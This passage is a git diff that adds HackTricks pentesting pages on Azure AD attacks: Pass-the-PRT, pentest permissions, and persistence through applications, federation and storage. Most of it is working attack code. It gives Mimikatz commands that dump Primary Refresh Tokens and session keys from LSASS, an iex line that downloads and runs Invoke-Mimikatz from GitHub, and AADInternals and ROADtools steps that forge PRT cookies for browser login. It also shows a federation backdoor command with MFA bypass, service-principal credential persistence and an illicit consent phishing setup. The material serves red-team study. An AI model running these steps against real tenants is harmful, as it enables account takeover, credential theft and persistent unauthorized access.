+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md
new file mode 100644
index 0000000000..4cef6beb1e
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md
@@ -0,0 +1,321 @@
+# Az - Pass the PRT
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## What is a PRT
+
+{% content-ref url="az-primary-refresh-token-prt.md" %}
+[az-primary-refresh-token-prt.md](az-primary-refresh-token-prt.md)
+{% endcontent-ref %}
+
+### Check if you have a PRT
+
+```
+Dsregcmd.exe /status
+```
+
+In the SSO State section, you should see the **`AzureAdPrt`** set to **YES**.
+
+<figure><img src="../../../.gitbook/assets/image (140).png" alt=""><figcaption></figcaption></figure>
+
+In the same output you can also see if the **device is joined to Azure** (in the field `AzureAdJoined`):
+
+<figure><img src="../../../.gitbook/assets/image (135).png" alt=""><figcaption></figcaption></figure>
+
+## PRT Cookie
+
+The PRT cookie is actually called **`x-ms-RefreshTokenCredential`** and it's a JSON Web Token (JWT). A JWT contains **3 parts**, the **header**, **payload** and **signature**, divided by a `.` and all url-safe base64 encoded. A typical PRT cookie contains the following header and body:
+
+```json
+{
+  "alg": "HS256",
+  "ctx": "oYKjPJyCZN92Vtigt/f8YlVYCLoMu383"
+}
+{
+  "refresh_token": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAZ18nQkT-eD6Hqt7sf5QY0iWPSssZOto]<cut>VhcDew7XCHAVmCutIod8bae4YFj8o2OOEl6JX-HIC9ofOG-1IOyJegQBPce1WS-ckcO1gIOpKy-m-JY8VN8xY93kmj8GBKiT8IAA",
+  "is_primary": "true",
+  "request_nonce": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAPrlbf_TrEVJRMW2Cr7cJvYKDh2XsByis2eCF9iBHNqJJVzYR_boX8VfBpZpeIV078IE4QY0pIBtCcr90eyah5yAA"
+}
+```
+
+The actual **Primary Refresh Token (PRT)** is encapsulated within the **`refresh_token`**, which is encrypted by a key under the control of Azure AD, rendering its contents opaque and undecryptable to us. The field **`is_primary`** signifies the encapsulation of the primary refresh token within this token. To ensure that the cookie remains bound to the specific login session it was intended for, the `request_nonce` is transmitted from the `logon.microsoftonline.com` page.
+
+### PRT Cookie flow using TPM
+
+The **LSASS** process will send to the TPM the **KDF context**, and the TPM will used **session key** (gathered when the device was registered in AzureAD and stored in the TPM) and the previous context to **derivate** a **key,** and this **derived key** is used to **sign the PRT cookie (JWT).**
+
+The **KDF context is** a nonce from AzureAD and the PRT creating a **JWT** mixed with a **context** (random bytes).
+
+Therefore, even if the PRT cannot be extracted because it's located inside the TPM, it's possible to abuseLSASS to **request derived keys from new contexts and use the generated keys to sign Cookies**.
+
+<figure><img src="../../../.gitbook/assets/image (31).png" alt=""><figcaption></figcaption></figure>
+
+## PRT Abuse Scenarios
+
+As a **regular user** it's possible to **request PRT usage** by asking LSASS for SSO data.\
+This can be done like **native apps** which request tokens from **Web Account Manager** (token broker). WAM pasess the request to **LSASS**, which asks for tokens using signed PRT assertion. Or it can be down with **browser based (web) flow**s where a **PRT cookie** is used as **header** to authenticate requests to Azure AS login pages.
+
+As **SYSTEM** you could **steal the PRT if not protected** by TPM or **interact with PRT keys in LSASS** using crypto APIs.
+
+## Pass-the-PRT Attack Examples
+
+### Attack - ROADtoken
+
+For more info about this way [**check this post**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/). ROADtoken will run **`BrowserCore.exe`** from the right directory and use it to **obtain a PRT cookie**. This cookie can then be used with ROADtools to authenticate and **obtain a persistent refresh token**.
+
+To generate a valid PRT cookie the first thing you need is a nonce.\
+You can get this with:
+
+```powershell
+$TenantId = "19a03645-a17b-129e-a8eb-109ea7644bed"
+$URL = "https://login.microsoftonline.com/$TenantId/oauth2/token"
+
+$Params = @{
+    "URI"     = $URL
+    "Method"  = "POST"
+}
+$Body = @{
+"grant_type" = "srv_challenge"
+}
+$Result = Invoke-RestMethod @Params -UseBasicParsing -Body $Body
+$Result.Nonce
+AwABAAAAAAACAOz_BAD0_8vU8dH9Bb0ciqF_haudN2OkDdyluIE2zHStmEQdUVbiSUaQi_EdsWfi1 9-EKrlyme4TaOHIBG24v-FBV96nHNMgAA
+```
+
+Or using [**roadrecon**](https://github.com/dirkjanm/ROADtools):
+
+```powershell
+roadrecon auth prt-init
+```
+
+Then you can use [**roadtoken**](https://github.com/dirkjanm/ROADtoken) to get a new PRT (run in the tool from a process of the user to attack):
+
+```powershell
+.\ROADtoken.exe <nonce>
+```
+
+As oneliner:
+
+{% code overflow="wrap" %}
+```powershell
+Invoke-Command - Session $ps_sess -ScriptBlock{C:\Users\Public\PsExec64.exe - accepteula -s "cmd.exe" " /c C:\Users\Public\SessionExecCommand.exe UserToImpersonate C:\Users\Public\ROADToken.exe AwABAAAAAAACAOz_BAD0__kdshsy61GF75SGhs_[...] > C:\Users\Public\PRT.txt"}
+```
+{% endcode %}
+
+Then you can use the **generated cookie** to **generate tokens** to **login** using Azure AD **Graph** or Microsoft Graph:
+
+```powershell
+# Generate
+roadrecon auth --prt-cookie <prt_cookie>
+
+# Connect
+Connect-AzureAD --AadAccessToken <token> --AccountId <acc_ind>
+```
+
+### Attack - Using roadrecon
+
+### Attack - Using AADInternals and a leaked PRT
+
+`Get-AADIntUserPRTToken` **gets user’s PRT token** from the Azure AD joined or Hybrid joined computer. Uses `BrowserCore.exe` to get the PRT token.
+
+```powershell
+# Get the PRToken
+$prtToken = Get-AADIntUserPRTToken
+
+# Get an access token for AAD Graph API and save to cache
+Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken
+```
+
+Or if you have the values from Mimikatz you can also use AADInternals to generate a token:
+
+```powershell
+# Mimikat "PRT" value
+$MimikatzPRT="MC5BWU..."
+
+# Add padding
+while($MimikatzPrt.Length % 4) {$MimikatzPrt += "="}
+
+# Decode
+$PRT=[text.encoding]::UTF8.GetString([convert]::FromBase64String($MimikatzPRT))
+
+# Mimikatz "Clear key" value
+$MimikatzClearKey="37c5ecdfeab49139288d8e7b0732a5c43fac53d3d36ca5629babf4ba5f1562f0"
+
+# Convert to Byte array and B64 encode
+$SKey = [convert]::ToBase64String( [byte[]] ($MimikatzClearKey -replace '..', '0x$&,' -split ',' -ne ''))
+
+# Generate PRTToken with Nonce
+$prtToken = New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey -GetNonce
+$prtToken
+## You can already use this token ac cookie in the browser
+
+# Get access token from prtToken
+$AT = Get-AADIntAccessTokenForAzureCoreManagement -PRTToken $prtToken
+
+# Verify access and connect with Az. You can see account id in mimikatz prt output
+Connect-AzAccount -AccessToken $AT -TenantID <tenant-id> -AccountId <acc-id>
+```
+
+Go to [https://login.microsoftonline.com](https://login.microsoftonline.com), clear all cookies for login.microsoftonline.com and enter a new cookie.
+
+```
+Name: x-ms-RefreshTokenCredential
+Value: [Paste your output from above]
+Path: /
+HttpOnly: Set to True (checked)
+```
+
+Then go to [https://portal.azure.com](https://portal.azure.com)
+
+{% hint style="danger" %}
+The rest should be the defaults. Make sure you can refresh the page and the cookie doesn’t disappear, if it does, you may have made a mistake and have to go through the process again. If it doesn’t, you should be good.
+{% endhint %}
+
+### Attack - Mimikatz
+
+#### Steps
+
+1. The **PRT (Primary Refresh Token) is extracted from LSASS** (Local Security Authority Subsystem Service) and stored for subsequent use.
+2. The **Session Key is extracted next**. Given that this key is initially issued and then re-encrypted by the local device, it necessitates decryption using a DPAPI masterkey. Detailed information about DPAPI (Data Protection API) can be found in these resources: [HackTricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) and for an understanding of its application, refer to [Pass-the-cookie attack](az-pass-the-cookie.md).
+3. Post decryption of the Session Key, the **derived key and context for the PRT are obtained**. These are crucial for the **creation of the PRT cookie**. Specifically, the derived key is employed for signing the JWT (JSON Web Token) that constitutes the cookie. A comprehensive explanation of this process has been provided by Dirk-jan, accessible [here](https://dirkjanm.io/digging-further-into-the-primary-refresh-token/).
+
+{% hint style="danger" %}
+Note that if the PRT is inside the TPM and not inside `lsass` **mimikatz won't be able to extract it**.\
+However, it will be possible to g**et a key from a derive key from a context** from the TPM and use it to **sign a cookie (check option 3).**
+{% endhint %}
+
+You can find an **in depth explanation of the performed process** to extract these details in here: [**https://dirkjanm.io/digging-further-into-the-primary-refresh-token/**](https://dirkjanm.io/digging-further-into-the-primary-refresh-token/)
+
+{% hint style="warning" %}
+This won't exactly work post August 2021 fixes to get other users PRT tokens as only the user can get his PRT (a local admin cannot access other users PRTs), but can access his.
+{% endhint %}
+
+You can use **mimikatz** to extract the PRT:
+
+```powershell
+mimikatz.exe
+Privilege::debug
+Sekurlsa::cloudap
+
+# Or in powershell
+iex (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1")
+Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap"'
+```
+
+(Images from https://blog.netwrix.com/2023/05/13/pass-the-prt-overview)
+
+<figure><img src="../../../.gitbook/assets/image (251).png" alt=""><figcaption></figcaption></figure>
+
+**Copy** the part labeled **Prt** and save it.\
+Extract also the session key (the **`KeyValue`** of the **`ProofOfPossesionKey`** field) which you can see highlighted below. This is encrypted and we will need to use our DPAPI masterkeys to decrypt it.
+
+<figure><img src="../../../.gitbook/assets/image (182).png" alt=""><figcaption></figcaption></figure>
+
+{% hint style="info" %}
+If you don’t see any PRT data it could be that you **don’t have any PRTs** because your device isn’t Azure AD joined or it could be you are **running an old version** of Windows 10.
+{% endhint %}
+
+To **decrypt** the session key you need to **elevate** your privileges to **SYSTEM** to run under the computer context to be able to use the **DPAPI masterkey to decrypt it**. You can use the following commands to do so:
+
+```
+token::elevate
+dpapi::cloudapkd /keyvalue:[PASTE ProofOfPosessionKey HERE] /unprotect
+```
+
+<figure><img src="../../../.gitbook/assets/image (183).png" alt=""><figcaption></figcaption></figure>
+
+#### Option 1 - Full Mimikatz
+
+* Now you want to copy both the Context value:
+
+<figure><img src="../../../.gitbook/assets/image (210).png" alt=""><figcaption></figcaption></figure>
+
+* And the derived key value:
+
+<figure><img src="../../../.gitbook/assets/image (150).png" alt=""><figcaption></figcaption></figure>
+
+* Finally you can use all this info to **generate PRT cookies**:
+
+```bash
+Dpapi::cloudapkd /context:[CONTEXT] /derivedkey:[DerivedKey] /Prt:[PRT]
+```
+
+<figure><img src="../../../.gitbook/assets/image (282).png" alt=""><figcaption></figcaption></figure>
+
+* Go to [https://login.microsoftonline.com](https://login.microsoftonline.com), clear all cookies for login.microsoftonline.com and enter a new cookie.
+
+```
+Name: x-ms-RefreshTokenCredential
+Value: [Paste your output from above]
+Path: /
+HttpOnly: Set to True (checked)
+```
+
+* Then go to [https://portal.azure.com](https://portal.azure.com)
+
+{% hint style="danger" %}
+The rest should be the defaults. Make sure you can refresh the page and the cookie doesn’t disappear, if it does, you may have made a mistake and have to go through the process again. If it doesn’t, you should be good.
+{% endhint %}
+
+#### Option 2 - roadrecon using PRT
+
+* Renew the PRT first, which will save it in `roadtx.prt`:
+
+{% code overflow="wrap" %}
+```bash
+roadtx prt -a renew --prt <PRT From mimikatz> --prt-sessionkey <clear key from mimikatz>
+```
+{% endcode %}
+
+* Now we can **request tokens** using the interactive browser with `roadtx browserprtauth`. If we use the `roadtx describe` command, we see the access token includes an MFA claim because the PRT I used in this case also had an MFA claim.
+
+```bash
+roadtx browserprtauth
+roadtx describe < .roadtools_auth
+```
+
+<figure><img src="../../../.gitbook/assets/image (44).png" alt=""><figcaption></figcaption></figure>
+
+#### Option 3 - roadrecon using derived keys
+
+Having the context and the derived key dumped by mimikatz, it's possible to use roadrecon to generate a new signed cookie with:
+
+{% code overflow="wrap" %}
+```bash
+roadrecon auth --prt-cookie <cookie> --prt-context <context> --derives-key <derived key>
+```
+{% endcode %}
+
+## References
+
+* [https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/](https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/)
+* [https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/)
+* [https://www.youtube.com/watch?v=x609c-MUZ\_g](https://www.youtube.com/watch?v=x609c-MUZ_g)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md b/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md
new file mode 100644
index 0000000000..d8149527ad
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md
@@ -0,0 +1,33 @@
+# Az - Permissions for a Pentest
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+To start the tests you should have access with a user with **Reader permissions over the subscription** and **Global Reader role in AzureAD**. If even in that case you are **not able to access the content of the Storage accounts** you can fix it with the **role Storage Account Contributor**.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-persistence/README.md b/pentesting-cloud/azure-security/az-persistence/README.md
new file mode 100644
index 0000000000..3e463b6811
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-persistence/README.md
@@ -0,0 +1,98 @@
+# Az - Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### Illicit Consent Grant
+
+By default, any user can register an application in Azure AD. So you can register an application (only for the target tenant) that needs high impact permissions with admin consent (an approve it if you are the admin) - like sending mail on a user's behalf, role management etc.T his will allow us to **execute phishing attacks** that would be very **fruitful** in case of success.
+
+Moreover, you could also accept that application with your user as a way to maintain access over it.
+
+### Applications and Service Principals
+
+With privileges of Application Administrator, GA or a custom role with microsoft.directory/applications/credentials/update permissions, we can add credentials (secret or certificate) to an existing application.
+
+It's possible to **target an application with high permissions** or **add a new application** with high permissions.
+
+An interesting role to add to the application would be **Privileged authentication administrator role** as it allows to **reset password** of Global Administrators.
+
+This technique also allows to **bypass MFA**.
+
+{% code overflow="wrap" %}
+```powershell
+$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
+$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
+Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a
+```
+{% endcode %}
+
+* For certificate based authentication
+
+{% code overflow="wrap" %}
+```powershell
+Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>
+```
+{% endcode %}
+
+### Federation - Token Signing Certificate
+
+With **DA privileges** on on-prem AD, it is possible to create and import **new Token signing** and **Token Decrypt certificates** that have a very long validity. This will allow us to **log-in as any user** whose ImuutableID we know.
+
+**Run** the below command as **DA on the ADFS server(s)** to create new certs (default password 'AADInternals'), add them to ADFS, disable auto rollver and restart the service:
+
+```powershell
+New-AADIntADFSSelfSignedCertificates
+```
+
+Then, update the certificate information with Azure AD:
+
+```powershell
+Update-AADIntADFSFederationSettings -Domain cyberranges.io
+```
+
+### Federation - Trusted Domain
+
+With GA privileges on a tenant, it's possible to **add a new domain** (must be verified), configure its authentication type to Federated and configure the domain to **trust a specific certificate** (any.sts in the below command) and issuer:
+
+```powershell
+# Using AADInternals
+ConvertTo-AADIntBackdoor -DomainName cyberranges.io
+
+# Get ImmutableID of the user that we want to impersonate. Using Msol module
+Get-MsolUser | select userPrincipalName,ImmutableID
+
+# Access any cloud app as the user
+Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true
+```
+
+## References
+
+* [https://aadinternalsbackdoor.azurewebsites.net/](https://aadinternalsbackdoor.azurewebsites.net/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md b/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md
new file mode 100644
index 0000000000..e7c185893f
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md
@@ -0,0 +1,59 @@
+# Az - Queue Storage Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Queue
+
+For more information check:
+
+{% content-ref url="../az-services/az-queue-enum.md" %}
+[az-queue-enum.md](../az-services/az-queue-enum.md)
+{% endcontent-ref %}
+
+### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/write`
+
+This permission allows an attacker to create or modify queues and their properties within the storage account. It can be used to create unauthorized queues, modify metadata, or change access control lists (ACLs) to grant or restrict access. This capability could disrupt workflows, inject malicious data, exfiltrate sensitive information, or manipulate queue settings to enable further attacks.
+
+{% code overflow="wrap" %}
+```bash
+az storage queue create --name <new-queue-name> --account-name <storage-account>
+
+az storage queue metadata update --name <queue-name> --metadata key1=value1 key2=value2 --account-name <storage-account>
+
+az storage queue policy set --name <queue-name> --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name <storage-account>
+```
+{% endcode %}
+
+## References
+
+* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
+* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
+* https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md b/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md
new file mode 100644
index 0000000000..196d5ebf43
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md
@@ -0,0 +1,72 @@
+# Az - Storage Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Storage Privesc
+
+For more information about storage check:
+
+{% content-ref url="../az-services/az-storage.md" %}
+[az-storage.md](../az-services/az-storage.md)
+{% endcontent-ref %}
+
+### Common tricks
+
+* Keep the access keys
+* Generate SAS
+  * User delegated are 7 days max
+
+### Microsoft.Storage/storageAccounts/blobServices/containers/update && Microsoft.Storage/storageAccounts/blobServices/deletePolicy/write
+
+These permissions allows the user to modify blob service properties for the container delete retention feature, which enables or configures the retention period for deleted containers. These permissions can be used for maintaining persistence to provide a window of opportunity for the attacker to recover or manipulate deleted containers that should have been permanently removed and accessing sensitive information.
+
+{% code overflow="wrap" %}
+```bash
+az storage account blob-service-properties update \
+  --account-name <STORAGE_ACCOUNT_NAME> \
+  --enable-container-delete-retention true \
+  --container-delete-retention-days 100
+```
+{% endcode %}
+
+### Microsoft.Storage/storageAccounts/read && Microsoft.Storage/storageAccounts/listKeys/action
+
+These permissions can lead to the attacker to modify the retention policies, restoring deleted data, and accessing sensitive information.
+
+{% code overflow="wrap" %}
+```bash
+az storage blob service-properties delete-policy update \
+  --account-name <STORAGE_ACCOUNT_NAME> \
+  --enable true \
+  --days-retained 100
+```
+{% endcode %}
+
+{% hint style="success" %}
